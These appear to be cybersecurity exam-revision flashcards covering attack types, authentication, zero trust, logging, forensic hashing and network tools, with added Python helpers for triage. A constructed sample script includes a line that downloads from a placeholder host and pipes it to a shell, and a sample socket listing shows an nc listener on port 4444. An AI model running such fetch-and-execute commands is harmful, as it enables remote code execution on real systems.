1. Cyber Security Concepts Flashcards

Quiz Revision

1
Q

A hacktivist group claims responsibility for infecting a manufacturer’s systems by planting an infected USB drive at the company’s office. The manufacturer’s distributor, several vendors, and hundreds of customers were all eventually infected with the malware that stole important credential information.

Which term describes this attack strategy?

A)Cloud-based
B)Direct access
C)Supply-chain
D)Social media

A

A supply-chain attack does not hit the target directly; it compromises a weaker company or resource in the target's supply chain (a distributor, vendor, or supplier that helps the organization do business or build a product) and rides the trust between them. Here the planted USB drive is only the initial vector; what makes this a supply-chain attack is that the infection propagated from the manufacturer to its distributor, vendors, and customers. An increasing number of intrusions are carried out this way.

Direct access is the most straightforward type of attack and usually the most preventable. It is a physical or local attack, such as an attacker exploiting an unlocked workstation and using a boot disk to install malicious tools or simply stealing a device.

In a cloud-based attack, hackers may try and exploit vulnerabilities in cloud-based web service providers to gain access to a tenant organization’s data.

Social media attacks occur when malware is attached to social media posts or presented as downloads on social media sites. At their most dangerous, hackers can make it so a compromised site automatically infects a vulnerable computer.

2
Q

In order to log onto a system, you must first complete a CAPTCHA, then enter a code that is sent to your cell phone via SMS. What is that code an example of?

A)Passwordless
B)Cloud access security broker
C)Multi-factor authentication
D)Single sign-on

A

Passwordless authentication replaces the memorized secret with something the user does not have to remember: a hardware token, a smart card, a biometric, or a one-time passcode sent to a cell phone. In this scenario the SMS code is the only authentication factor (a CAPTCHA distinguishes humans from bots; it does not authenticate anyone), so this is passwordless rather than multi-factor. Note that SMS one-time codes are the weakest form of passwordless authentication: they are exposed to SIM-swap and SS7 interception, which is why NIST SP 800-63B treats out-of-band SMS as a restricted authenticator.

3
Q

CASB

A

A cloud access security broker (CASB) is a checkpoint where security policies are enforced, located between an organization’s users and its cloud providers. A CASB can ensure cloud security by comparing users, applications, and devices against multiple security policies.

4
Q

Which factors can MFA be based on?

A

Multi-factor authentication (MFA) requires two or more independent factors, each from a different category, to authenticate a user. A password plus a PIN is still a single factor, since both are something you know. The categories are:

Something you know, such as a password or PIN. (A user name identifies the account but is not secret, so it is not an authentication factor.)

Something you are, such as a biometric measurement, e.g. a fingerprint or facial recognition.

Something you have, such as a smart card or token.

Somewhere you are, often based on your GPS coordinates.

5
Q

In security operations, which of the following would provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness?

A)Windows registry
B)Logging levels
C)System processes
D)System hardening

A

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 to maintain the organization's security posture, and the system processes listed above provide the guidelines the SOC follows in its operations.

6
Q

Windows Registry?

A

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and process has its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.

7
Q

What are the logging level classifications?

A

Logging levels classify the severity or urgency of a logged event. The standard syslog severities (RFC 5424), from most to least urgent, are Emergency (0), Alert (1), Critical (2), Error (3), Warning (4), Notice (5), Informational (6), and Debug (7). In a syslog message the severity is packed together with the facility into the leading PRI value as facility * 8 + severity, so a line beginning <34> is facility 4 (auth) at severity 2 (Critical).
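The PRI decoding described above, as an added example that is not part of the original flashcards: a small Python decoder that splits a syslog line's PRI into facility and severity and keeps only the lines at or above a chosen urgency. The sample lines are constructed for illustration, not real logs.

```python
import re

# Syslog severity codes (RFC 5424, section 6.2.1): lower number = more urgent.
SEVERITY = {
    0: "Emergency", 1: "Alert", 2: "Critical", 3: "Error",
    4: "Warning", 5: "Notice", 6: "Informational", 7: "Debug",
}

# Facility codes 0-23 (RFC 5424, table 1); only the common ones are named here.
FACILITY = {
    0: "kern", 1: "user", 2: "mail", 3: "daemon", 4: "auth", 5: "syslog",
    6: "lpr", 7: "news", 8: "uucp", 9: "cron", 10: "authpriv", 11: "ftp",
    16: "local0", 17: "local1", 18: "local2", 19: "local3",
    20: "local4", 21: "local5", 22: "local6", 23: "local7",
}

PRI_RE = re.compile(r"^<(\d{1,3})>")


def decode_pri(line):
    """Return (facility_name, severity_name, severity_code) for one syslog line.

    PRI = facility * 8 + severity, so severity is PRI % 8 and facility is PRI // 8.
    Raises ValueError if the line has no valid <PRI> prefix.
    """
    m = PRI_RE.match(line)
    if not m:
        raise ValueError("no <PRI> prefix: %r" % line[:40])
    pri = int(m.group(1))
    if pri > 191:  # 23 * 8 + 7 is the largest legal PRI
        raise ValueError("PRI out of range: %d" % pri)
    facility, severity = divmod(pri, 8)
    return FACILITY.get(facility, "facility%d" % facility), SEVERITY[severity], severity


def filter_by_severity(lines, max_code):
    """Keep lines whose severity code is <= max_code (i.e. at least that urgent).

    Malformed lines are skipped rather than aborting the whole batch.
    """
    kept = []
    for line in lines:
        try:
            fac, sev, code = decode_pri(line)
        except ValueError:
            continue
        if code <= max_code:
            kept.append((fac, sev, line))
    return kept


# Constructed sample lines for illustration (not real logs).
SAMPLE = [
    "<34>Oct 11 22:14:15 host su: 'su root' failed for lonvick on /dev/pts/8",
    "<13>Oct 11 22:14:16 host app: user logged in",
    "<165>Oct 11 22:14:17 host app: cache warmed",
    "<7>Oct 11 22:14:18 host kernel: debug trace",
    "garbage line without a PRI",
]

if __name__ == "__main__":
    # Show everything at Warning or more urgent.
    for fac, sev, line in filter_by_severity(SAMPLE, max_code=4):
        print(fac, sev, line)
```

Running it prints only the auth/Critical line; the Notice and Debug lines fall below the Warning threshold and the malformed line is dropped.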

8
Q

System Hardening

A

System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Examples of system hardening activities include removing unnecessary applications, closing down ports, and adjusting permissions.

9
Q

Which of the following has a Policy Engine, a Policy Administrator, and a Policy Enforcement Point?

A)Personally identifiable information (PII)
B)Cardholder data
C)Data loss prevention
D)Zero trust

A

Zero-trust architecture, as defined in NIST SP 800-207, consists of a Policy Engine (PE), a Policy Administrator (PA), and a Policy Enforcement Point (PEP). The goal of zero trust is to continuously evaluate the authentication and authorization of devices, users, and processes rather than trusting anything because of its network location. The Policy Engine makes the grant or deny decision, based primarily on policy but also on other inputs such as device health and threat intelligence. The Policy Administrator acts on that decision by instructing the PEP to open or close the communication path from the requester to the resource. The Policy Enforcement Point establishes, monitors, and terminates the connections.

10
Q

What does DLP prevent when it comes to PII and CHD?

A

Data loss prevention (DLP), personally identifiable information (PII), and cardholder data (CHD) are all related to sensitive data protection.

Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event.

Personally identifiable information (PII) is data that can be used to identify a single individual.

Cardholder data is very sensitive data in e-commerce transactions. The way an organization stores, processes, and transmits CHD is regulated by the Payment Card Industry Data Security Standard (PCI DSS). The most recent major version of PCI DSS is 4.0.

11
Q

Your company is governed by several regulations that state that you must use automated systems that provide CCE and CVE identifiers for vulnerability scans. Which of the following should you implement?

A)SCAP
B)SIEM
C)NAC
D)SNMP

A

You should implement Security Content Automation Protocol (SCAP), the NIST specification that standardizes how scanners express configuration checks and findings. Its component standards include Common Configuration Enumeration (CCE) and Common Vulnerabilities and Exposures (CVE) identifiers, along with CPE for platform names, CVSS for severity scoring, OVAL for machine-readable checks, and XCCDF for checklists. SIEM, NAC, and SNMP do not produce CCE or CVE identifiers.

12
Q

SIEM

A

Security information and event management (SIEM) provides centralized security event management. When SIEM is implemented, security analysts can produce reports on all ingested data.

13
Q

SNMP

A

Simple Network Management Protocol (SNMP) collects management information from devices. It is used to monitor and configure network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network. Note that SNMPv1 and v2c authenticate with a cleartext community string, often left at the default "public"; SNMPv3 with authentication and privacy (authPriv) should be used, and SNMP should never be reachable from untrusted networks.

14
Q

The team is analyzing a shell script that was run on a server. How can they recognize comments in the script?

A)line starts with a #
B)line starts with $
C)line starts with a !
D)line starts with a @

A

Comments are ignored by the shell. They begin with the hash symbol (#) at the start of a word and continue to the end of the line. Two caveats matter when reading a recovered script: the first line #!/bin/bash looks like a comment to the shell but is the shebang the kernel uses to choose the interpreter, and a # inside quotes or in the middle of a word (as in $#, the number of positional parameters) is not a comment at all.

The exclamation mark (!) appears in the shebang, in history expansion, and in the != relational operator, which returns true if the two operands are not equal and false otherwise.

The dollar sign ($) introduces parameter expansion, as in $HOME or $1; the special parameter $? holds the exit status of the last executed command.

The at symbol (@) is used with the $ symbol as $@, which expands to all of the positional parameters passed to the script, each as a separate word.
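As an added example that is not part of the original card, a Python splitter that separates shell code from comments using the rules above, including the shebang, quoted #, escaped #, and $# cases that trip up a naive search for lines starting with #. The sample script is constructed for illustration.

```python
def split_shell_comments(script):
    """Split each line of a POSIX/bash script into (code, comment).

    Rules applied (simplified bash lexing):
      * '#' starts a comment only at the start of a word: at the beginning of
        the line or right after whitespace or one of ; | & (
      * '#' inside single or double quotes is literal
      * a backslash-escaped '#' is literal
      * '$#' (count of positional parameters) is not a comment
      * the shebang '#!' on line 1 is returned as code, because the kernel
        reads it to pick the interpreter even though the shell ignores it
    Quote state carries across lines so multi-line quoted strings survive.
    Returns a list of (code, comment) tuples; comment is '' when absent.
    """
    pairs = []
    in_single = in_double = False
    for lineno, line in enumerate(script.splitlines()):
        if lineno == 0 and line.startswith("#!"):
            pairs.append((line, ""))
            continue
        code = []
        comment = ""
        at_word_start = True
        i = 0
        while i < len(line):
            ch = line[i]
            if ch == "\\" and not in_single and i + 1 < len(line):
                code.append(line[i:i + 2])  # escaped character, kept verbatim
                i += 2
                at_word_start = False
                continue
            if ch == "'" and not in_double:
                in_single = not in_single
            elif ch == '"' and not in_single:
                in_double = not in_double
            elif ch == "#" and not in_single and not in_double and at_word_start:
                comment = line[i:]
                break
            code.append(ch)
            at_word_start = (not in_single and not in_double) and ch in " \t;|&("
            i += 1
        pairs.append(("".join(code).rstrip(), comment))
    return pairs


def strip_shell_comments(script):
    """Return the script text with comments removed (shebang retained)."""
    return "\n".join(code for code, _ in split_shell_comments(script))


# Constructed sample, not a real captured script.
SAMPLE_SCRIPT = """#!/bin/bash
# stage the payload
URL="http://example.invalid/x#frag"  # fragment is not a comment
echo "$# args given" # $# is a parameter count
[ "$1" != "run" ] && exit 1
curl -s "$URL" | sh   # pipe to shell
"""

if __name__ == "__main__":
    for code, comment in split_shell_comments(SAMPLE_SCRIPT):
        print("%-45s | %s" % (code, comment))
```

Reading the comment column separately is often worthwhile during triage: attackers leave notes to themselves in scripts, and those notes survive even when the code is obfuscated.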

15
Q

Obtaining which of the following can reduce the likelihood of purchasing counterfeit equipment?

A)Fingerprint
B)OEM documentation
C)SLA
D)Hash value

A

One of the ways you can reduce the likelihood of purchasing counterfeit equipment is to insist on the inclusion of verifiable original equipment manufacturer (OEM) documentation. In many cases, this paperwork includes anti-counterfeiting features. Make sure you use the vendor website to verify all of the various identifying numbers in the documentation.

16
Q

You have quarantined an instance of malware and would like to execute the payload to see what it does without spreading it through the network. What tool or process could be used to do this safely?

A)Cuckoo Sandbox
B)email header analysis
C)DKIM
D)pattern recognition

A

Cuckoo Sandbox is used to investigate suspicious files or websites. It not only analyzes files and websites but also traces API calls, dumps any related network traffic, and analyzes the processes running in memory. When you execute a malicious payload in a sandbox, the sandbox allows it to run while containing any activity the payload generates. Run the sandbox on an isolated, non-production network segment, and be aware that malware which detects virtualization or sandbox artifacts may refuse to run or behave differently than it would on a victim's machine.

17
Q

You are a cyber security analyst. Your organization has several products and services implemented within their IT environment. Management finds it difficult to view security and operational metrics for all the products. You recommend that management approve implementing single pane of glass solution to resolve the visibility issue.

Which of the following statements is NOT true of implementing a single pane of glass solution?

A)It increases efficiency by eliminating the need to switch back and forth between separate IT operations management solutions.
B)It provides an easy-to-navigate GUI.
C)It provides a centralized display of security and operational metrics that is readily available to management.
D)It displays and sends data in real time from the centralized application whenever relevant events occur in the environment.

A

A single pane of glass solution does not display and send data in real time when relevant events occur in the environment. You would implement webhooks in an application to display and send data in real time when a relevant event occurs in the environment. Webhooks can be leveraged to automate certain workflows.

A single pane of glass solution provides a single management console that displays data from multiple sources. The glass in the term “single pane of glass” refers to a computer monitor or mobile screen where users can view meaningful data from multiple sources.

18
Q

What features can a single pane of glass solution include? What are the benefits?

A

A single pane of glass solution provides many features and benefits, such as:

A centralized display of security and operational metrics that is easy for management to read and understand.

An efficient solution that eliminates the need to switch back and forth between IT operations management solutions.

An easy-to-navigate graphical user interface (GUI).

Typically, single pane of glass solutions also provide event alerts and notifications, root cause analysis, remote debugging capabilities, reporting, and the ability to integrate data from multiple technologies and vendors.

19
Q

You are assisting a senior forensics investigator with a crime scene. While you are watching, he runs the following command:

user@kaplan:~# md5sum /dev/pw3

He receives the following output:

9b98b637a132974e41e3c6ae1fc9fc96 /dev/pw3

What is the long string of values in the output called?

A)Initialization vector
B)Hash value
C)Salt value
D)Encryption key

A

That value is the hash value (also called a message digest), derived by running the device against the MD5 hashing algorithm. MD5 is deprecated for security use because collisions can be generated at will, so current practice is to record a SHA-256 digest alongside it, or instead of it. The algorithm generates the value from the contents of the file or volume against which it was run; its usefulness is in providing a way to determine, at a later time, whether the file or volume has changed. To validate an image, a hash is generated for both the original and the copy. If the hashes match, the images are identical. Both hashes should be recorded as part of the forensic log for the investigation. Because the command hashes the raw block device, it should be run with the device attached read-only or behind a write blocker, otherwise the act of examining the evidence can alter it.

It is not an encryption key. Encryption keys are used to encipher a message. MD5 does not perform encryption. It generates a value that can be used to determine the integrity of the file or volume.

It is not an initialization vector (IV). These are values used within certain encryption algorithms to add randomness to the calculations to prevent patterns in the output that can be used to reverse-engineer the encryption key.

A salt value is random data that is used as an additional input to a one-way function that “hashes” a password or passphrase. It is used to make cracking the hash more difficult.
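An added Python example, not from the original card, showing how an analyst would hash an image in fixed-size chunks (so a multi-gigabyte device does not have to fit in memory), record MD5 and SHA-256 together from a single read, and compare the original against a copy. The demo data under __main__ is generated on the fly, and the function names are this example's own.

```python
import hashlib
import io
import os
import tempfile

CHUNK = 1024 * 1024  # 1 MiB reads keep memory flat on multi-GB images


def hash_stream(fobj, algorithms=("md5", "sha256")):
    """Hash a binary stream once, feeding every algorithm from the same read.

    Returns {algorithm: hexdigest}. MD5 is kept for comparison with legacy
    evidence logs, but it is collision-broken, so the SHA-256 digest is the
    one that actually carries the integrity claim.
    """
    hashers = {name: hashlib.new(name) for name in algorithms}
    for block in iter(lambda: fobj.read(CHUNK), b""):
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data, algorithms=("md5", "sha256")):
    """Convenience wrapper for in-memory data (tests, small artifacts)."""
    return hash_stream(io.BytesIO(data), algorithms)


def hash_file(path, algorithms=("md5", "sha256")):
    """Hash a file or block device path; open it read-only."""
    with open(path, "rb") as f:
        return hash_stream(f, algorithms)


def images_match(original, copy):
    """True only if every digest recorded for the original matches the copy."""
    return all(original.get(name) == copy.get(name) for name in original)


if __name__ == "__main__":
    # Constructed demo: a small "evidence" image, a faithful copy, and a copy
    # with one flipped bit, all written to a temporary directory.
    with tempfile.TemporaryDirectory() as d:
        data = bytearray(os.urandom(3 * CHUNK + 17))
        paths = {}
        for name in ("disk.img", "disk.img.copy"):
            paths[name] = os.path.join(d, name)
            with open(paths[name], "wb") as f:
                f.write(data)
        data[4242] ^= 0x01  # single-bit change in the tampered copy
        paths["disk.img.tampered"] = os.path.join(d, "disk.img.tampered")
        with open(paths["disk.img.tampered"], "wb") as f:
            f.write(data)
        original = hash_file(paths["disk.img"])
        for name in ("disk.img.copy", "disk.img.tampered"):
            digests = hash_file(paths[name])
            verdict = "match" if images_match(original, digests) else "MISMATCH"
            print(name, verdict, digests["sha256"][:16])
```

The single-bit flip in the demo produces completely different digests, which is exactly the property the forensic log relies on; note also that a matching MD5 alone would not be enough to rule out a deliberately crafted substitute, which is why both digests are stored.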

20
Q

Which network architecture concept allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents?

A)Secure Access Service Edge
B)Hybrid
C)Software-defined networking
D)On-premises

A

Software-defined networking (SDN) allows for dynamic reconfiguration of a network as a reaction to changes in volume, types of traffic, and security incidents.

On-premises network architecture allows an organization to maintain control of its architecture and resources by hosting it on-site. With on-premises, the organization can also host a private cloud on its hardware.

Hybrid cloud architecture is an environment where some workloads run in a public cloud and some in a private cloud. In short, a public cloud allows an organization to "rent space" (much like a tenant in an office building) in another organization's Internet-accessible datacenter, place sharable resources in that space, and configure access to those resources. A private cloud is cloud infrastructure dedicated to a single tenant, whether hosted on the organization's own hardware or by a provider.

Secure Access Service Edge (SASE) converges software-defined wide area networking (SD-WAN) with cloud-delivered security services such as secure web gateway, CASB, firewall as a service, and zero trust network access, so that remote users and branch offices get consistent policy enforcement wherever the resources live. SASE is often associated with the zero-trust model.

21
Q

Which threat actor type can be characterized by having an unsophisticated skill level, uses widely available tools, and is frequently motivated by the need to prove that they can do it?

A)Nation-state
B)Script kiddie
C)Hacktivist
D)Organized crime

A

Script kiddies typically have an unsophisticated skill level and rely on tools that are widely available on the Internet. They are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, script kiddies have limited time and financial resources.

22
Q

Hacktivists

A

Hacktivists are activists who use hacking techniques to promote a political or social agenda. Their activities include DoS and DDoS attacks, website defacement, and embarrassing posts on the websites or social media accounts of organizations with opposing views. They often believe they are engaging in a righteous and morally correct cause, even if their activities are illegal. As with script kiddies, hacktivists often have limited time and financial resources. However, a hacktivist within a sophisticated or large organization may have access to significant resources.

23
Q

Organized Crime

A

Organized crime attacks are carried out by criminal groups for the sole purpose of monetary gain. Organizations such as the Mafia, Russian organized crime, the Japanese Yakuza, and drug cartels have significant resources in terms of time and money to recruit hackers to carry out their agenda.

24
Q

Nation-state or APT

A

Nation-state or Advanced Persistent Threat (APT) attacks are conducted by one nation against another nation, or against a significant entity within the target country, and feature large coordinated attacks. APT attackers have significant time and financial resources. Motives could be financial, political, disruption of the economy, or theft of intellectual property such as military secrets.

25
Q

Your organization’s reputation is staked on a book it publishes yearly. When you perform data classification, how should you classify this book and its contents?

A)intellectual property
B)corporate confidential data
C)PHI
D)personally identifiable information

A

Intellectual property is a tangible or intangible asset to which the owner has exclusive rights. Intellectual property law is a group of laws that recognizes exclusive rights for creations of the mind. This includes books and music.

26
Q

PII

A

Personally identifiable information (PII) is any piece of data that can be used alone or with other information to identify a single person.

27
Q

PHI

A

Protected health information (PHI) is individually identifiable health information, such as the medical records of individuals, and must be protected in specific ways as prescribed by the regulations issued under the Health Insurance Portability and Accountability Act (HIPAA) of 1996.

28
Q

Corporate confidential data

A

Corporate confidential data includes trade secrets, unreleased intellectual property, application source code, and other data whose unauthorized disclosure could seriously affect the organization. The book contains corporate data, but it cannot be considered confidential if it is released into the public space every year.

29
Q

During a data classification meeting, someone mentions a type of data covered by PCI DSS. What type of data is this?

A)Corporate confidential data
B)PHI
C)Intellectual property
D)Credit card data

A

The Payment Card Industry Data Security Standard (PCI DSS) affects any organizations that handle cardholder data (CHD) for the major credit card companies. The latest version of the standard is 4.0. To prove compliance with the standard, an organization must be reviewed annually.

30
Q

You need a tool that can aggregate logs from multiple firewalls, send alerts when certain behaviors are detected in the network, provide trend analysis, and analyze user behavior. What should you choose?

A)WHOIS
B)SOAR
C)SIEM
D)EDR

A

A Security Information and Event Management (SIEM) system collects data from the different security devices in the system, such as firewalls and IPSes, and then aggregates the log files for analysis. It provides predictive trend analysis, behavior analytics, alerts, and even helps you comply with regulations like SOX and HIPAA. Automated alerting and triggers are SIEM features that allow the system to react based on predetermined criteria.

31
Q

SOAR

A

A Security Orchestration, Automation, and Response (SOAR) playbook is a checklist of incident response steps to be performed when an incident occurs, with as many of those steps as possible executed automatically. In Microsoft Azure, the Microsoft Sentinel service (formerly Azure Sentinel) has playbooks that automate and orchestrate responses to threats. You can configure a playbook to run manually or automatically in response to specific alerts or incidents that are triggered by an automation rule.

32
Q

EDR

A

Endpoint Detection and Response (EDR) is designed to supplement existing controls such as antivirus. An EDR agent continuously records endpoint telemetry (process creation, file and registry changes, network connections), detects suspicious behaviour against that record, and gives analysts the ability to investigate and respond, for example by isolating the host or killing a process. Its emphasis is proactive detection of attacker behaviour rather than reactive cleanup after a signature match.

33
Q

WHOIS

A

WHOIS is a directory service that returns registration details for a domain name or an IP address block: the registrant or organization, the registrar, and contact and date information (often redacted for privacy).

34
Q

You have discovered that several workstation computers on your company’s network have been infected with a Trojan that is used to target a single server. Which vulnerability has infected the workstation computers?

A)APT
B)Ransomware
C)Spyware
D)DDoS

A

A Distributed Denial of Service (DDoS) is the intended answer: the Trojan has turned the workstations into bots (zombies) that will be directed to flood a single server. Strictly speaking, a DDoS is an attack rather than a vulnerability; the weakness that allowed the infection is whatever let the Trojan execute on the workstations in the first place.

Spyware enables an attacker to obtain information about another’s computer activities by transmitting data covertly from their hard drive.

Ransomware is malicious software that blocks access to a computer system until a sum of money is paid.

An advanced persistent threat (APT) is an attack in which an unauthorized user accesses a network and stays there undetected for a long period of time with the intention of stealing data.

35
Q

You are a security analyst working with a forensic investigator. The investigator has found data on a very old Windows computer. You decide to run OpenVAS. Which function is provided by this tool?

A)Vulnerability scan
B)Fuzzer
C)Packet capture
D)Interception proxy

A

OpenVAS is a vulnerability scanning tool (the open-source fork of Nessus, now maintained by Greenbone). Other vulnerability scanners include Qualys, Nessus, and Nexpose; Nikto is a scanner specialized for web servers.

36
Q

Fuzzer

A

Fuzzers include Untidy, Peach Fuzzer, and Microsoft SDL File/Regex Fuzzer.

With fuzzing, malformed, unexpected, or random inputs are fed to the program under test in an attempt to find vulnerabilities or crash-causing inputs, while the target is monitored for crashes, hangs, and memory errors. Examples of vulnerabilities that fuzzing can surface are SQL injection, buffer overflows, denial of service, and cross-site scripting.

37
Q

Interception Proxies

A

Interception proxies include Burp Suite, ZAP, and Vega

38
Q

Packet Capture Tools

A

Packet capture tools include Wireshark, tcpdump, Network General, and Aircrack-ng.

39
Q

Which of the following is a process similar to building a system image but for applications?

A)Serverless
B)Containerization
C)Federation
D)Virtualization

A

Containerization is similar to building a system image, but for applications. It is an application development model that stores everything needed to run that application in an executable image. All of the libraries, binaries, configuration info, etc., are stored in the container.

40
Q

Serverless

A

Serverless is an application development model that provides developers the opportunity to build and run applications in the cloud, without the added responsibility of having to maintain servers.

41
Q

Federation

A

Federation allows members of disparate networks or organizations to interoperate: each party keeps its own infrastructure, but devices such as routers and gateways and the services they provide are configured to a common standard. Roaming between cell phone carriers is one example. In identity management, federation lets one organization's identity provider vouch for its users to another organization's services, typically over SAML or OpenID Connect, so the user authenticates once at home and is not issued a separate account at every partner.

42
Q

You have just been hired as a junior cybersecurity analyst. The orientation process involves shadowing a senior analyst. To gauge your current knowledge level, the senior analyst is testing your ability to recognize various tools of the trade. He gives you a quick look at a tool's GUI. [Screenshot of the tool's GUI not reproduced here.] Which tool is it?

A

The tool shown is Wireshark, which is a packet analyzer. Packet analyzers are also called sniffers or protocol analyzers. This type of tool captures traffic on the network.

43
Q

Which of the infrastructure concepts below provides developers with the opportunity to build and run applications in the cloud, without the extra responsibility of having to maintain servers?

A)Serverless
B)Secure Access Service Edge
C)Containerization
D)Virtualization

A

Serverless is an application development model that provides developers the opportunity to build and run applications in the cloud, without the extra responsibility of having to maintain servers on premises.

44
Q

SASE

A

Secure Access Service Edge (SASE) converges software-defined wide area networking (SD-WAN) with cloud-delivered security services such as secure web gateway, CASB, firewall as a service, and zero trust network access, so that remote users and branch offices get consistent policy enforcement wherever the resources live. SASE is often associated with the zero-trust model.

45
Q

Recently, there was an attack on the network, but the team was unable to gather enough information to identify the attacker. If the attack happens again, then you want to have more time to gather information while it is still occurring. What should you implement?

A)Subnets
B)VLAN
C)Honeypot
D)Jump box

A

You should implement a honeypot. Honeypots are systems configured to look attractive to attackers and lure them into spending time attacking them while information is gathered about the attack. Because a honeypot is meant to be compromised, it must be isolated from production systems and monitored closely so that it cannot be used as a pivot into the real network.

46
Q

Which of the following network architecture concepts consists of a Policy Engine, a Policy Administrator, and a Policy Enforcement point?

A)Hybrid
B)Zero-trust
C)Cloud
D)Secure Access Service Edge

A

Zero-trust architecture, as defined in NIST SP 800-207, consists of a Policy Engine (PE), a Policy Administrator (PA), and a Policy Enforcement Point (PEP). The goal of zero trust is to continuously evaluate the authentication and authorization of devices, users, and processes rather than trusting anything because of its network location. The Policy Engine makes the grant or deny decision, based primarily on policy but also on other inputs such as device health and threat intelligence. The Policy Administrator acts on that decision by instructing the PEP to open or close the communication path from the requester to the resource. The Policy Enforcement Point establishes, monitors, and terminates the connections.

47
Q

Your team has recently become concerned with activity on unexpected ports. You need to display the current protocol statistics and port connections for Windows and UNIX/Linux computers. Which command should you use?

A)netstat
B)tracert
C)ping
D)nbtstat

A

Netstat (network statistics) is a TCP/IP utility that you can use to determine the computer’s inbound and outbound TCP/IP connections. Used without parameters, it displays a list of the current connections and their listening ports, including the protocol (TCP or UDP), local IP address and port, foreign IP address and port, and connection state.

When connections to unexpected ports are suspected, netstat can be used to identify the origin of any connections to the ports in question.

Many current Linux distributions no longer install netstat by default (it belongs to the legacy net-tools package). Use the ss (socket statistics) command from iproute2 instead. To see all listening TCP sockets, run ss -lt; add -n to show numeric ports instead of service names and -p (as root) to show the owning process, as in ss -ltnp. Sample output of ss -lt:

mcmillan@server69:~$ ss -lt
State   Recv-Q   Send-Q   Local Address:Port   Peer Address:Port
LISTEN  0        128      *:7080               *:*
LISTEN  0        128      *:6032               *:*
LISTEN  0        128      *:http               *:*
LISTEN  0        128      *:6033               *:*
LISTEN  0        128      *:6033               *:*
LISTEN  0        128      *:6033               *:*
LISTEN  0        128      *:6033               *:*
LISTEN  0        128      *:ssh                *:*
LISTEN  0        128      *:https              *:*
LISTEN  0        128      :::ssh               :::*
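An added Python example, not from the original card, that parses ss -ltnp output and flags listeners on unexpected ports or served by unexpected processes, which is the check an analyst actually wants after spotting odd ports. The sample output and allowlist are constructed for illustration.

```python
import re

# Pulls process name and pid out of ss's "users:((...))" column (needs -p, run as root).
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_ss(output):
    """Parse `ss -ltnp` text into rows: {addr, port, proc, pid}.

    Only LISTEN rows are returned; the header and anything malformed is skipped.
    Handles IPv4 ("0.0.0.0:22"), IPv6 ("[::]:22") and wildcard ("*:22") forms.
    """
    rows = []
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue
        addr, _, port = parts[3].rpartition(":")
        if not port.isdigit():
            continue
        m = PROC_RE.search(line)
        rows.append({
            "addr": addr,
            "port": int(port),
            "proc": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return rows


def find_unexpected(output, allowlist):
    """Flag listeners whose port is not allowlisted, or is served by the wrong process.

    allowlist maps port -> expected process name. Returns (port, addr, proc, reason)
    tuples; loopback-only listeners are annotated since they are reachable only
    from the host itself, but they still warrant a look.
    """
    findings = []
    for row in parse_ss(output):
        expected = allowlist.get(row["port"])
        if expected is None:
            reason = "port not in allowlist"
        elif row["proc"] is not None and row["proc"] != expected:
            reason = "expected %s, found %s" % (expected, row["proc"])
        else:
            continue
        if row["addr"] in ("127.0.0.1", "[::1]"):
            reason += " (loopback only)"
        findings.append((row["port"], row["addr"], row["proc"], reason))
    return findings


# Constructed `ss -ltnp` output for illustration; not taken from a real host.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=1201,fd=6))
LISTEN 0      128    127.0.0.1:6032      0.0.0.0:*         users:(("proxysql",pid=1330,fd=20))
LISTEN 0      128    0.0.0.0:4444        0.0.0.0:*         users:(("nc",pid=2991,fd=3))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=812,fd=4))
"""

# Ports this host is supposed to expose, and the daemon that should own each.
ALLOWLIST = {22: "sshd", 80: "nginx"}

if __name__ == "__main__":
    for port, addr, proc, reason in find_unexpected(SAMPLE_SS, ALLOWLIST):
        print("%5d %-12s %-10s %s" % (port, addr, proc, reason))
```

Checking the owning process as well as the port catches the case where an allowed port has been taken over by something else (a listener on 80 owned by a scripting interpreter rather than the web server), which a port-only comparison would miss.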

48
Q

Which command shows NetBIOS information?

A

Issuing nbtstat at a Windows command prompt shows NetBIOS over TCP/IP information. Common forms are nbtstat -n (the local machine's NetBIOS name table), nbtstat -c (the NetBIOS name cache), and nbtstat -A <IP address> (the name table of a remote host).

49
Q

Tracert vs Traceroute

A

Issuing tracert at a Windows command prompt will trace the route a packet takes from the source computer to the destination host. Traceroute is the Linux equivalent of the tracert command.

50
Q

Which of the following is NOT an open-source method of collecting threat intelligence?

A)social media
B)blogs/forums
C)paid feeds
D)government bulletins

A

While paid security feeds are valuable, they are not open source: they are proprietary and available only to paying subscribers, so they are considered closed-source intelligence.

Social media sites, blogs, and forums can be used to gather threat intelligence, both about attackers (who often discuss tools and targets openly) and about your own exposure, especially when employees or bloggers reveal more than they should about the organization. Since these public sites are available to all, any information gathered from them is open-source intelligence.

Government bulletins are a good source of the details of the latest known attacks and attack approaches. Since these bulletins are available to all, this is open-source intelligence.

51
Q

